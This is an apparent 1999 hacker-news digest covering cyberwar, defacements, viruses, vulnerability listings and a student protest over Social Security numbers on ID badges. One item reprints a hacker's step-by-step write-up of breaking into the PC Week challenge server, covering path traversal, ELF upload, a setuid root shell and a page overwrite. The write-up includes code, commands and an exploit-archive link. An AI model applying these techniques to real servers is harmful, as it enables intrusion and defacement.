SEPTEMBER 23, 1999 . . . 17:55 EDT
DOD may have waged first cyberwar in Serbia
BY BOB BREWIN (antenna@fcw.com)
The United States put together its first small group of information warriors, a move that has convinced some Defense experts that the military waged a cyberwar against Serbia this year.
According to a high-level draft briefing paper prepared for Adm. James Ellis, the group of information warriors -- or what the Defense Department refers to as an information operations cell -- was one of the "great successes'' of the 78-day war. Ellis is commander of U.S. Naval Forces in Europe and of Joint Task Force Noble Anvil -- the U.S. component of the NATO nations participating in Operation Allied Force.
According to the draft briefing, information operations (IO) have "an incredible potential" and that "properly executed, IO could have halved the length of the campaign."
A Navy spokesman for Ellis in London declined to say whether the United States engaged in offensive cyberattacks against Serbian computers and command and control systems. Instead, he recited a textbook definition of IO, which included "actions taken to affect adversary information systems'' as well as to defend U.S. systems. Offensive IO actions range from jamming and physical attacks on information systems to computer network attacks.
While the spokesman declined to identify which of those actions the United States used against Serbian information systems during Operation Allied Force, retired Maj. Gen. Doyle Larson, chairman of the Air Force Association, said he doubted that the United States set up an IO cell just to manage the bombing of Serbian computer centers or to engage in traditional jamming of Serb radar and radios.
Larson, who was the commander of the Air Force Electronic Security Command in the 1980s, said he was convinced that the United States used cyberwar tactics to attack Serb information systems, pointing out that the United States "is attacked all the time by hackers."
@HWA
18.6 PCWEEK CHALLENGE SITE HACKED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Sla5h, smuddo@yahoo.com
by Thejian, Friday 23rd September 1999 on 5:45 pm CET
Earlier this week, PC Week Labs "threw down the gaunlet to hackers" with its hack-challenge, it seems that the Secure Linux part of that site now has been defaced. The index shows the messages "Jfs was here" and "details in the file called jfs* in this directory."
@HWA
18.7 "Got Root" Got rooted
~~~~~~~~~~~~~~~~~~~~~
Contributed by Sla5h, smuddo@yahoo.com
22.09.1999 19:10
Today official website of RootFest was hacked by citadel. On the hacked page citadel is accusing lothos
( organizator of RootFest ). " back back in the old days he went by the name of deadfall. but after he
and some friends were busted, he narc'd on them. from then on he was labeled deadnarc. as you can imagine
this would be a problem if you were trying to portray the image of a "hacker". so he changed his handle
to lothos. ", were the words on defaced page.
Links:
Attrition mirror http://www.attrition.org/mirror/attrition/1999/09/21/www.rootfest.org/
(The site claimed that lothos was a narq and had this to say on the hacked page:
you may think you know this young man,
but you do not. his name is mike monson. back
back in the old days he went by the name of
deadfall. but after he and some friends were
busted, he narc'd on them. from then on he
was labeled deadnarc. as you can imagine this
would be a problem if you were trying to
portray the image of a "hacker". so he changed
his handle to lothos. then last spring he had
conference called "rootfest". above are two
photos taken of him at rootfest.
wether the allegations are true or not has not been verified, however lothos did speak out in his
behalf. we'll publish this if/when I can find a copy of the interview. -Ed )
@HWA
18.8 Hotmail again
~~~~~~~~~~~~~~
Contributed by Sla5h, smuddo@yahoo.com
23.09.1999 19:10
Looks like Hotmail 's got problems with security (again). This time problem is with JavaScript (again). Attacker could send a HTML e-mail to victim in HTML there would bec JavaScript that opens same login window as hotmail's. Microsoft admited that this is antoher way to steal password.
Links:
Cnet http://news.cnet.com/news/0-1005-200-122099.html
@HWA
18.9 Misc vulnerabilities and some reading materials
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Sla5h, smuddo@yahoo.com
+ V U L N E R A B I L I T I E S +
___________________________________________________________________________________________
Microsoft IIS 4.0 Domain Resolution Vulnerability http://securityfocus.net/level2/bottom.html?go=vulnerabilities&id=657 Remote: Yes
Local: No
Exploit: Yes Published: Thu Sep 23 1999
Updated: Thu Sep 23 1999
IIS 4.0 allows an administrator the option to restrict access by specifying a domain or an IP address If a domain is restricted, but a machine in that domain that cannot be resolved makes an HTTP request, the IIS server will respond as usual. Any subsequent requests will be denied.
Restricted hosts with an IP address that can be resolved to a domain name will be denied access from the first request.
___________________________________________________________________________________________
FreeBSD vfs_cache Denial of Service Vulnerability http://securityfocus.net/level2/bottom.html?go=vulnerabilities&id=653 Remote: Yes
Local: Yes
Exploit: Yes Published: Wed Sep 22 1999
Updated: Wed Sep 22 1999
A vulnerability exists in FreeBSD's new VFS cache introduced in version 3.0 that allows a local and possibly remote user to force the kernel to consume large quantities of wir...
+ R E A D I N G +
___________________________________________________________________________________________
Security Problems in the TCP/IP Protocol Suite http://securityfocus.net/level2/bottom.html?go=library&id=1463 by Steven Bellovin
Type: paper Year: 1989
Download: PS
The TCP/IP protocol suite, which is widely used today, was developed under the sponsorship of the Department of Defense. Despite that, there are a number of serious security flaws inherent in the protocols, regardless of the correctness of any implementations. We describe a variety of attacks based on these flaws, including sequence number spoofing, routing attacks, source address spoofing, and authentication attacks. We also present defenses against these attacks, and conclude with a discussion of broad-spectrum defenses such as encryption.
copyright (c) SLa5H ,member of HWA.hax0r.news
@HWA
19.0 ACTIVE X TROJAN
~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Sunday 25th September 1999 on 8:35 pm CET
TL security published information about ActiveX trojan. "The shareme activex trojan
writes two .reg files. Then runs them in order. The first file enables file sharinghe
second shares out the targets hard drive with hiddennames like top-d$, top-f$, etc.
These two reg files are then run in order. The system would take these changes into
effect after the next reboot." Contributed by Thierry
@HWA
20.0 ANALYSYS BY JFS - The PCWeek hack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Sunday 25th September 1999 on 8:15 pm CET
Mentes Inquietas, !Hispahack webzine has the story by Jfs about getting into linux
part of PC Week cracking contest. In it his explains every step he did until he
succeeded. http://hispahack.ccc.de/en/mi019en.htm
A practical vulnerability analysis
(The PcWeek crack)
By Jfs
First of all, I had to gather information on the remote host, what ports the machine
had open and what possibilities were left open. After checking that most of the
ports were either filtered by the firewall or unusable due to the tcp
wrapper in the host, I decided that I was left only with the HTTP server.
lemming:~# telnet securelinux.hackpcweek.com 80
Trying 208.184.64.170...
Connected to securelinux.hackpcweek.com.
Escape character is '^]'.
POST X HTTP/1.0
HTTP/1.1 400 Bad Request
Date: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
(...)
Connection closed by foreign host.
lemming:~#
So, it was running apache on a Red Hat box. The webpage said that the server will also
run mod_perl, but mod_perl leaves a fingerprint in the Server: header which
was not shown in the header that this server sent out.
Apache 1.3.6 doesn't ship with any CGI programs available to the remote user, but I didn't
know about the RH distro, so I gave the common faulty CGIs a try
(test-cgi, wwwboard, Count.cgi...)
After no results, I tried to find out what the website structure was, gathering information
from the HTML pages, I found out that the server had this directories under
the DocumentRoot of the website:
/
/cgi-bin
/photoads/
/photoads/cgi-bin
So I got interested in the photoads thingie, which seemed like an installable package to me.
After some searching on the WWW I found out that photoads was a commercial CGI package from
"The Home Office Online" (http://www.hoffice.com). It sells for $149, and they grant you
access to the source code (Perl), so that you can check and modify it.
I asked a friend if he would let me gave a look at his photoad installation
and this is how I got access to a copy of what could be running in the securelinux machine.
I checked the default installation files and I was able to retrieve the ads database
(stored in the http://securelinux.hackpcweek.com/photoads/ads_data.pl) with all the
user passwords for their ads. I also tried to access the configuration file
/photoads/cgi-bin/photo_cfg.pl but because of the server setup I couldn't get it.
I got the /photoads/cgi-bin/env.cgi script (similar to test-cgi) to give me details of the
server such as the location in the filesystem of the DocumentRoot (/home/httpd/html) apart
from other interesting data (user the server runs as, in this case nobody).
So, first things first, I was trying to exploit either SSI (Server side includes) or the
mod_perl HTML-embedded commands, which look something like:
<!--#include file="..."--> for SSI
<!--#perl ...--> for mod_perl
The scripts filtered thsi input on most of the fields, through a perl regexp that didn't
leave you with much room to exploit. But I also found a user assigned variable that wasn't
checked for strange values before making it into the HTML code, which will let me embed the
commands inside the HTML for server side parsing:
In post.cgi, line 36:
print "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
The $ENV{'HTTP_REFERER'} is a user provided variable (though you have to know a bit of how
HTTP headers work in order to get it right), which will allow us to embed any HTML into the
code, regardless of what the data looks like.
Refer to the files getit.ssi and getit.mod_perl for the actual exploit.
To exploit it, do something like:
lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80
But unfortunately, the host didn't have SSI nor mod_perl configured, so I
hit a dead end.
I decided to find a hole in the CGI scripts. Most of the holes in perl scripts are found in
open(), system() or `` calls. The first allows reading, writing and executing,
while the last two allow execution.
There were no occurrences of the last two, but there were a few of the open() call:
lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more
advisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
photo.cgi: open ( FILE, $filename );
(...)
There was nothing to do with the ones referring to $BaseDir and $DataFile as these were defined
in the config file and couldn't be changed in runtime.
Same for the $mailprog.
But the other two lines are juicier...
In photo.,cgi, line 132:
$write_file = $Upload_Dir.$filename;
open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
print ULFD $UPLOAD{'FILE_CONTENT'};
close(ULFD);
So if we are able to modify the $write_file variable we will be able write to any file in the
filesystem. The $write_file variable comes from:
$write_file = $Upload_Dir.$filename;
$Upload_Dir is defined in the config file, so we can't change it, but what about $filename?
In photo.cgim line 226:
if( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }
$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
if ($filename =~ m/gif/) {
$type = '.gif';
}elsif ($filename =~ m/jpg/) {
$type = '.jpg';
}else{
{&Not_Valid_Image}
}
So the variable comes from $UPLOAD{'FILE_NAME'} (extracted from the variables sent to the CGI by
the form). We see a regexp that $filename must match in order to help us get where we want to get,
so we can't just sent any file we want to, e.g. "../../../../../../../../etc/passwd", cos it will
get nulled out by the substitution :
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
We see, if the $filename matches the regexp, it's turned to ascii 1 (SOH).
Apart from this, $filename must contain "gif" or "jpg" in its name in order
to pass the Not_Valid_Image filter.
So, after playing a bit with various approaches and with a bit of help from
Phrack's last article on Perl CGI security we find that
/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif
should allow us to refer to the index.html file (the one we have to modify, the main page in the
web server).
But then, in order to upload we still need to fool some more script code...
We notice that we won't be able to fool the filename if we send the form in
a POST (the %00 doesn't get translated), so we are left out with only a GET.
In photo.cgi, line 256, we can see that some checks are done in the actual content of the file we
just uploaded (:O) and that if the file doesn't comply with some specifications (basically
width/length/size) of the image (remember, the photo.cgi script was supposed to be used as a method
to upload a photoad to be bound to your AD). If we don't comply with these details the script will
delete the file we just uploaded (or overwritten), and that's not what we want (at least not if we want
to leave our details somewhere in the server :).
PCWeek has the ImageSize in the configuration file set to 0, so we can forget about the JPG part of
the function. Let's concentrate on the GIF branch:
if ( substr ( $filename, -4, 4 ) eq ".gif" ) {
open ( FILE, $filename );
my $head;
my $gHeadFmt = "A6vvb8CC";
my $pictDescFmt = "vvvvb8";
read FILE, $head, 13;
(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
close FILE;
$PhotoWidth = $width;
$PhotoHeight = $height;
$PhotoSize = $size;
return;
}
and in photo.cgi, line 140:
if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
{&Not_Valid_Image}
}
if ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
}
So we have to make the $PhotoWidth less than 700, different from "" and smaller than ImgWidth
(350 by default).
So we are left with $PhotoWidth != "" && $PhotoWidth < 350 .
For $PhotoHeight it has to be smaller than $ImgHeight (250 by default).
So, $PhotoWidth == $PhotoHeight == 0 will do for us. Looking at the script that gets the
values into those variables, the only thing we have to do is to set the values in the 6th
to 9th byte to ascii 0 (NUL).
We make sure that we put our FILE_CONTENT to comply with that and proceed with the next problem in the code...
chmod 0755, $Upload_Dir.$filename;
$newname = $AdNum;
rename("$write_file", "$Upload_Dir/$newname");
Show_Upload_Success($write_file);
Argh!!! After all this hassle and the file gets renamed/moved to somewhere we don't want it to be :(
Checking the $AdNum variable that gives the final location its name we see that it can only contain digits:
$UPLOAD{'AdNum'} =~ tr/0-9//cd;
$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+%$@*//cd;
$AdNum = $UPLOAD{'AdNum'};
Anything else gets removed, so we can't play with the ../../../ trick in here anymore :|
So, what can we do? The rename() function expects us to give him two paths, the old one and the new one... wait, there is no error checking on the function, so if it
fails it'll just keep on processing the next line. How can we make it fail? using a bad file name. Linux kernel has got a restriction on how long a file can be, defaults to
1024 (MAX_PATH_LEN), so if we can make the script rename our file to something longer than 1024 bytes, we'll have it! :)
So, next step we pass it a _really large_ AD number, approximately 1024 bytes long.
Now, the script won't allow us to process the script as it only allows us to post photos for ADs number that do exist... and it will take us a hell of a lot of time to
create taht many messages in the board 10^1024 seems quite a long time to me :)
So... another dead end?
Nah, the faulty input checking functions let us create an add with the number we prefer. Just browse through the edit.cgi script and think what will happen if you enter
a name that has a carriage return in between, then
a 1024 digits number? :) We got it...
Check the long.adnum file for an exploit that gets us the new ad created.
So, after we can fool the AdNum check, the script makes what we do, that is:
Create/overwrite any file with nobody's permissions, and with the contents
that we want (except for the GIF header NULs).
So, let's try it
Check the overwrite.as.nobody script that allows us to do that.
So far so good. So, we adjust the script to overwrite the index.html web page... and it doesn't work. Duh :(
It's probably that we didn't have the permission to overwrite that file (it's owned by root or it's not the right mode to overwrite it). So, what do we do now? Let's try
a different approach...
We try to overwrite a CGI and see it we can make it run for us :) This way we can search for the "top secret" file and we'll get the prize anyway :)
We modify the overwrite script, and yes, it allows us to overwrite a CGI! :)
We make sure we don't overwrite any important (exploit-wise) CGI and we choose the advisory.cgi (what does it do anyway? :)).
So, we will upload a shell script that will allow us to execute commands, cool...
But then, when you run a shell script as a CGI, you need to specify the
shell in the first line of the script, as in:
#!/bin/sh
echo "Content-type: text/html"
find / "*secret*" -print
And remember, our 6th, 7th, 8th and 9th bytes had to be 0 or a very small value in order to comply with the size specifications...
#!/bi\00\00\00\00n/sh
That doesn't work, the kernel only reads the first 5 bytes, then tries to execute "#!/bi"... and as far as I know there is no shell we can access that fits in 3 bytes (+2
for the #!). Another dead end...
Looking at an ELF (linux default executable type) binary gives us the answer, as it results that those bytes are set to 0x00, yohoo :)
So we need to get an ELF executable into the file in the remote server. We have to url-encode it as we can only use GETs, not POSTs, and thus we are limited to a
maximum URI length. The default maximum URI length for Apache is 8190 bytes. Remember that we had a _very long_ ad number of 1024 characters, so we are
left with about 7000 bytes for our URL-encoded ELF program.
So, this little program:
lemming:~/pcweek/hack/POST# cat fin.c
#include <stdio.h>
main()
{
printf("Content-type: text/html\n\n\r");
fflush(stdout);
execlp("/usr/bin/find","find","/",0);
}
compiled gives us:
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*
And stripping the symbols:
lemming:~/pcweek/hack/POST# strip fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST#
Then URL-encoding it:
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url
Which is TOO large for us to use in our script :(
so, we edit the binary by hand using our intuition and decide to delete everything after the "GCC" string in the executable. It's not a very academic approach and
probably it'll pay to check the ELF specifications, but hey, it seems to work:
lemming:~/pcweek/hack/POST# joe fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
lemming:~/pcweek/hack/POST#
Now, we incorporate this into our exploit, and run it...
Check the file called get.sec.find in the files directory for more info.
Also there you will find the to_url script and some .c files with basic commands to run along with their URL translations and finished exploits.
So, we upload the CGI, and access it with our favorite browser, in this case:
wget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi
Which gives us a completed find / of the server :)
Unfortunately, either the "top secret" file is not there, or it is not accessible by the nobody user :(
We try some more combinations as locate, ls and others, but no traces of the "top secret" file.
[ I wonder where it was after all, if it ever existed ]
So, time to get serious and get root. As a friend of mine says, why try to reinvent the wheel, if it's already there. So with our data about the server
(Linux, i386 since my computer is an i386 and the ELFs ran as a charm...) we grep the local exploit database and find a nice exploit for all versions of RH's crontab.
Available on your nearest bugtraq/securityfocus store :) kudos to w00w00 for this
We modify it to tailor our needs, as we won't need an interactive rootshell, but to create a suidroot shell in some place accessible by the user nobody.
We tailor it to point to /tmp/.bs. We upload the CGI again, run it with our browser, and we are ready to see if the exploit runs fine.
We make a CGI that will ls /tmp and yeah, first try and we have the suitroot waiting for us :)
We upload a file to /tmp/xx with the modified index.html page.
Time to make a program that will run:
execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
And at this point the game is over :)
It's been around 20hours since we started, good timing 8)
We then upload and copy our details to a secure place where nobody will see them, and post a message in the forum waiting for replies :)
( Download PCWEEK.ZIP to get the xploits and scripts used. )
Jfs - !H'99
jfs@gibnet.gi
http://hispahack.ccc.de
The PCWEEK.ZIP archive contains the following:
Archive: ../pcweek.zip
Length Method Size Ratio Date Time CRC-32 Name
------ ------ ---- ----- ---- ---- ------ ----
567 Defl:N 334 41% 09-25-99 03:07 71a5491c getit.mod_perl
301 Defl:N 220 27% 09-25-99 03:07 99acc702 getit.ssi
1725 Defl:N 961 44% 09-25-99 04:36 409dbafd cp
1344 Defl:N 195 86% 09-25-99 03:55 bf129429 long.adnum
1482 Defl:N 273 82% 09-25-99 04:00 45eabccf overwrite.as.nobody
173 Defl:N 139 20% 09-25-99 04:36 2b8077da cp.c
4589 Defl:N 1130 75% 09-25-99 04:36 1eaeebae cp.url
1737 Defl:N 970 44% 09-25-99 04:36 c3b5d4c0 cp2
182 Defl:N 152 17% 09-25-99 04:36 96ef4516 cp2.c
4607 Defl:N 1136 75% 09-25-99 04:36 ced63691 cp2.url
2197 Defl:N 1232 44% 09-25-99 04:36 a8f288ca cr
1153 Defl:N 506 56% 09-25-99 04:36 ddb6ad31 cr.c
5729 Defl:N 1456 75% 09-25-99 04:36 920e86f7 cr.url
5838 Defl:N 1313 78% 09-25-99 04:36 26a419fe fes.cp
5856 Defl:N 1319 78% 09-25-99 04:36 ed441d3c fes.cp2
6976 Defl:N 1640 77% 09-25-99 04:36 b4bb0f1f fes.cr
1288 Defl:N 187 86% 09-25-99 04:36 ea735eab fes.delete
5722 Defl:N 1284 78% 09-25-99 04:36 e9ff4a66 fes.fil
5790 Defl:N 1292 78% 09-25-99 04:36 86962231 fes.ls
180 Defl:N 125 31% 09-25-99 04:36 0487481d fes.pl
1685 Defl:N 948 44% 09-25-99 04:36 0e839e45 fil
177 Defl:N 150 15% 09-25-99 04:36 ff116487 fil.c
4473 Defl:N 1097 76% 09-25-99 04:36 85c66ba0 fil.url
1693 Defl:N 943 44% 09-25-99 04:36 9d149df6 ls
136 Defl:N 121 11% 09-25-99 04:36 69182852 ls.c
4541 Defl:N 1106 76% 09-25-99 04:36 64756e15 ls.url
------ ------ --- -------
70141 20229 71% 26
You can get this from : http://hispahack.ccc.de/programas/pcweek.zip
@HWA
21.0 CALCULATOR IN THE URL
~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Saturday 24th September 1999 on 8:15 pm CET
This is a cool address picked up by Newstrolls (www.newstrolls.com). As the page
says: "The urlcalculator demonstrates the weirdest URL-tricks. YOU change the
hostname to the function and arguments you want; and you get the result on the
homepage of the site". Visit the help for calculator-in-the-URL on the following
address: http://$urlcalc(help).x42.com
@HWA
22.0 W97M_SUPPL
~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Saturday 24th September 1999 on 7:43 pm CET
Trend Micro found another macro virus in the wild. This new virus is distributed via
e-mail in an empty Word 97 document. Upon opening the SUPPL.DOC file,
W97M_SUPPL activates and copies itself to the Windows directory (as
ANTHRAX.INI). Once an infected system is rebooted, TROJ_SUPPL starts to spread
itself by attaching the SUPPL.DOC file to every outgoing message. After a system
has been infected for 163 hours, TROJ_SUPPL runs its destructive payload, which
tries to open all files with the .DOC, .XLS, .TXT, .RTF, .DBF, .ZIP, .ARJ and .RAR
extentions and truncate them. www.antivirus.com
@HWA
23.0 WHO IS TO "BLAME"
~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Saturday 24th September 1999 on 7:23 pm CET
After the Secure Linux part of the PC Week cracking contest was compromised,
hacker who was successful in it spoke on forum over there: "I suppose it's not Linux
who should get blamed but the company that _sells_ CGI scripts with improper
security checks. This applies to Unix, NT or whatever other operating system you are
running. The problem here, IMHO, is that the CGIs used were not open source. I'm
sure that if they had been open source somebody out there will have done a security
audit on them and patched the holes".
@HWA
24.0 LPAZ DEFACED
~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Saturday 24th September 1999 on 7:12 pm CET
Web site of The Arizona Libertorian Party has been compromised today. As posted
on defaced mailing list on Attrition, Jericho said "The 'lpaz' hack is interesting. No
elite speak, no cussing. A seemingly true political hack." Archive of the hack here
http://www.attrition.org/mirror/attrition/1999/09/24/www.lpaz.org/
@HWA
25.0 VIRUS WRITING OUTLAWED
~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 23rd September 1999 on 1:25 am CET
On Wednesday Parliament approved an amendment to Finnish criminal legislation
that will make the writing and spreading of computer viruses punishable under law.
Under the terms of the new law the writing, making available, or spreading computer
viruses will be punishable by fines or by prison terms of up to two years.
http://www.helsinki-hs.net/today/230999-05.html
Virus spreaders to feel the long arm of the law
On Wednesday Parliament approved an amendment to Finnish
criminal legislation that will make the writing and spreading of
computer viruses punishable under law. The decisive second
reading of the Bill cites the offence as a catch-all "Causing
danger to data processing systems". Under the terms of the new
law this will be punishable by fines or by prison terms of up to two
years. It is hoped to get the amendment into law as quickly as
possible.
The law stretches a net to catch those writing, making
available, or spreading computer viruses. This effectively means
for example that anyone who keeps a virus program on their
website that is available for downloading by visitors would
become liable under the law. Liability for punishment is not
limited to cases in which actual harm or hindrance is caused to
data systems, or where the data or files of the infected system
are corrupted or destroyed in the process. The intention to harm
becomes the primary criteria for bringing charges, and this
allows the authorities to bring offenders to book even if the virus
is caught before it has a chance to operate. Under current
Finnish law there is no official sanction for the making and
disseminating of computer viruses, although there have been
prosecutions in cases where an activated virus has caused
damage.
@HWA
26.0 NETWARE 5 BUG STRIKES NSS USERS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 23rd September 1999 on 1:10 am CET
Novell on Wednesday released an updated and debugged version of Support Pack 3,
called Support Pack 3A, to fix a potentially crippling data-loss problem tied to the
original support pack. Users of Novell Storage Services (NSS) found themselves in
trouble after downloading Support Pack 3 which contained a bug which was
destroying their NetWare 5 volumes. Novell suggested that users who have not yet
downloaded the support pack get the new Support Pack 3A, while those who already
have Support Pack 3 get the bug-fixing patch. More info
http://www.infoworld.com/cgi-bin/displayStory.pl?990922.hnnovellbug.htm
NetWare 5 bug strikes NSS users
By Stephanie Sanborn
InfoWorld Electric
Posted at 5:09 PM PT, Sep 22, 1999
Novell on Wednesday released an updated and debugged version of Support Pack 3, called Support Pack 3A, to fix a potentially crippling data-loss
problem tied to the original support pack.
Users of Novell Storage Services (NSS) found themselves in trouble after downloading Support Pack 3 a bug was destroying their NetWare 5 volumes.
According to Novell officials, upon learning of the bug the company initially created a patch for the support pack, which could be downloaded from the
Novell Web site. Support Pack 3 was also removed from the site.
In a statement, Sean Sanders, NetWare product marketing manager, and Gary King, a representative from Novell's technical support group, said,
"Fortunately, less than 1 percent of NetWare 5 users experienced this [volume-loss] problem. "
Novell has now posted Support Pack 3A, which it declared is free of the volume-destroying glitch.
" [IT managers] should immediately patch this thing, " said Eric J. Bowden, general manager at BugNet, in Lindon, Utah. "Go to Support Pack 3A and
bypass 3.0."
Novell suggested that users who have not yet downloaded the support pack get the new Support Pack 3A, while those who already have Support Pack 3
get the bug-fixing patch.
"That was a pretty critical bug for people who have installed NSS, " Bowden said. "Catastrophic bugs usually get the most press, and there arent that many
that can wipe out your file system. This one has the capability of wiping out your file system. "
However, Novell officials said that if a customer runs into the data-loss bug, they should immediately contact Novell technical support officials, who can
recreate the volumes and recover data.
"The best advice I can give is dont panic, but make informed decisions as you apply these patches, " Bowden added.
NetWare 5 patches and Support Pack 3A are available at www.support.novell.com.
Novell, Inc., in Provo, Utah, is at www.novell.com.
Stephanie Sanborn is an InfoWorld reporter. Additional reporting by Matthew Nelson, an InfoWorld senior writer.
@HWA
27.0 TAGGED STUDENTS DEFY BIG BROTHER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 23rd September 1999 on 0:25 am CET
Hundreds of students in this little town don't want to wear their Social Security
numbers around their necks for all to see. When the school year began a few weeks
ago, the students at Ruston High School, like many students across the nation, were
required to wear an ID badge as part of added security precautions. The badges in
Ruston include each student's Social Security number, a violation of federal law
according to two students. Although administrators claim the number is protected
from unauthorized use through encryption in the barcode, the students already
cracked the code.
http://www.worldnetdaily.com/bluesky_bresnahan/19990923_xex_tagged_stude.shtml
YOUR PAPERS, PLEASE
Tagged students
defy Big Brother
Reject being forced
to wear Social Security numbers
By David M. Bresnahan
© 1999 WorldNetDaily.com
RUSTON, Louisiana -- Hundreds of students in this
little town don't want to wear their Social Security
numbers around their necks for all to see. Their school
administrators have ignored their complaints even
though their numbers are growing.
When the school year began a few weeks ago, the
students at Ruston High School, like many students
across the nation, were required to wear an ID badge
as part of added security precautions. The badges in
Ruston include each student's Social Security number, a
violation of federal law according to two students.
The badges are worn on a lanyard with the Pepsi logo
on it. The badge has a photo of the student, the school
name, the student's name, and a barcode which
represents the Social Security number. Although
administrators claim the number is protected from
unauthorized use through encryption in the barcode, the
students know that is not true.
To prove how easy it is to read the barcodes, Jonathan
Washington, 16, reads any barcode in about 15
seconds. He tells other students their Social Security
number and then asks them to sign his petition to have
the cards changed.
His methods are convincing. Over 350 students have
signed in just the first few days. Rachel Winchel, 16,
another Ruston student, is helping to spread the protest
and circulate the petition.
"We just aren't taught code 39 barcode encryption in
school. It's just another system that is easily learned. It's
not that hard," explained Washington to WorldNetDaily.
He has created an Internet web page to teach others
how to read the cards.
Washington and Winchel are also concerned that a
student from the school did the work to enter all the
Social Security numbers into the computer that was
used to make the cards. They said little or no security
was used to protect the numbers from unauthorized use.
"Parents should have some concern because their
children's Social Security numbers are linked directly to
theirs in all financial records. If you have a child's you
can get the parents'. It's a financial jeopardy to just
about everyone in school," complained Washington.
He said his concern is a philosophical one, not religious.
Winchel is of a different opinion.
"I have religious and moral convictions behind what
they're doing as it being wrong. It's totally appalling,"
she said in a phone interview.
"I'm a person that's made by God and I'm not a number.
I'm more special than that. I do believe that it's
religiously wrong. I don't want to be branded and
labeled as livestock. We're more special than that," said
Winchel.
Washington is opposed to ID cards in general and does
not want his Social Security number displayed for all to
see, nor does he want it to be in school computers. His
parents are seeking legal counsel and have not ruled out
a lawsuit.
The parents of both Washington and Winchel expressed
complete support for what their children are doing.
Dr. Charles Scriber is principal of the school. Although
he met with Washington and his parents, he has ignored
a written complaint from Winchel and her mother. He
has not granted a written request for an appointment to
discuss her concerns.
In an interview with WorldNetDaily he defended the
practice and claims the cards are legal. He said he has
no plans to change the cards.
Since the faculty and administration also wear the cards,
students are busy taking down their Social Security
numbers with plans to publish the results on the Internet
if the cards are not discontinued.
"Actually, it's not difficult to look at it and know what it
means," explained Winchel. "There's narrow bars and
there's wide bars. Each number zero through nine has a
code. By memorizing the code for the number zero
through nine, you can just glance at someone's card and
the numbers just pop out.
"Many kids at school can do it, and it doesn't take very
long to even learn. That's why it concerned me because
it's very easy to learn," she explained.
Winchel and Washington have cut the barcode from
their cards. Amanda Winchel, Rachel's younger sister,
changed her card. She painted over the barcode then
created a new one which represents the number 911.
Winchel and Washington have now stopped wearing
their cards, but they have not been disciplined for doing
so. Their actions could lead to expulsion from school,
but that is a risk they are willing to take to stand up for
what they believe is right.
The Ruston High School Student Handbook detail the
rules regarding the cards and spells out the possible
penalties for infractions.
Washington's complaints to Dr. Scriber produced a
sudden change in policy in the past few days. The
librarian was told to remove Washington's Social
Security number from the library computer which reads
the barcodes. A new card has not been issued, and the
cafeteria computer has not been changed.
"He thought that would get me to leave him alone about
it," said Washington, who has vowed to continue his
fight. He will not be satisfied until the cards are
completely changed for all students. If the change is not
made he expects to take the school to court for civil
damages.
The school has always had an ID card, but past cards
were much different. They did not contain a Social
Security number, nor were they worn. Students were
only required to present the card when requested to do
so.
The new policy was instituted in response to the
numerous shootings at schools around the country.
Many schools now require ID cards to be worn as a
security measure.
Winchel and Washington both claim the ID badge will
not stop a potential killer.
"If anything, they are just good identification for when
you get shot at school so your parents can come and
see your ID badge when your body is mutilated. I don't
see how this would effect security in any way at all,"
exclaimed Winchel.
"It would not prevent a school shooting at all. The ID
badge does not change the mindset of the killers," she
added.
She also pointed out that the shootings at many schools
have been by students who would be wearing a badge if
their school had the same policy.
Winchel would object to the card even if the barcode
and Social Security number are no longer displayed.
She does not want her Social Security number to even
be in the school computer system.
"I'm not wearing mine because I'm tired of all of this
nonsense," she said. "I shouldn't have to wear it. I'm a
student. I shouldn't be treated as if I'm a felon. I have
